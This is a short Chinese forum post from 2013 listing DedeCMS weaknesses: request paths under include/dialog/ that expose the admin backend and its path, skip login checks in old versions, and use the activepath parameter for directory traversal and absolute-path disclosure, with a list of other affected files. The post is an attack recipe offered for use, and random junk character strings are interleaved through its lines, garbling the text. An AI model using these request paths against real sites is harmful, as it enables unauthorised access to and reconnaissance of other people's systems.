1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理
$ P, i) E' z0 R# d: j7 G, c* `1 T9 y; D" x `# X1 P! S) e/ K
员帐号,新版本的就直接转向了后台.
# R: _" @* [4 s
# H( ^2 r6 V2 S$ y7 r+ x1 J2.include/dialog/config.php会爆出后台管理路径7 n1 v; S' Z0 y* g5 f
3 @2 C' T/ d1 I9 d; C
3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录" G& ?" P4 e# p: @7 w8 j4 y
" `% b6 J' `; w8 L7 \' B% p/ B
4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.
) K4 S* {' z. x9 K- W1 {" z9 j/ B* o$ h9 @8 j
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉* H: f3 F8 E/ B% C* `
) e K+ f5 D4 L, H) f1 r
到根目录去.不过这些版本的访问地址有些不同.: T& r- o+ V" K+ N, K' o9 u/ c
地址为require/dialog/select_soft.php?activepath=/././././././././
" Y1 F, b7 c% T
) P, e0 H3 N1 K4 }4 _8 Qinclude\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..
: ?4 q: z9 j7 q4 W7 B2 S存在相同问题的文件还有* x/ ~8 d1 w* {+ f! K- j
include\dialog\select_images.php, v5 B( _8 `9 z- |- `
include\dialog\select_media.php! _% o( i. I# ], y7 n+ Y1 r
include\dialog\select_templets.php
7 \9 f- V1 z+ j$ {- ` |
发表于 2013-4-16 16:50:43
收藏
支持
反对